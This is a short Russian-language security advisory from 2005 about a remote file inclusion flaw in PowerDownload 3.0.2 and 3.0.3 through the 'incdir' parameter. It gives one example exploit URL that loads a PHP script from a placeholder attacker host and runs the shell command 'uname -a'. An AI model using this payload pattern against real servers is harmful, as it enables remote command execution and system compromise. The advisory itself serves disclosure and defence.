PHP-инклюдинг в PowerDownload

Дата публикации:
01.06.2005
Всего просмотров:
802
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PowerDownload 3.x
Уязвимые версии: PowerDownload 3.0.2, 3.0.3

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Уязвимость существует из-за недостаточной проверки входных данных в переменной 'incdir' сценария 'pdl-inc/pdl_header.inc.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php файл. Пример:

http://[target]/download/downloads.php?release_id=
650&incdir=http://[attacke]/cmd.gif?&cmd=uname%20-a

URL производителя: www.powerscripts.org/?page=projects&projectid=6

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PowerDownload Remote File Inclusion

или введите имя

CAPTCHA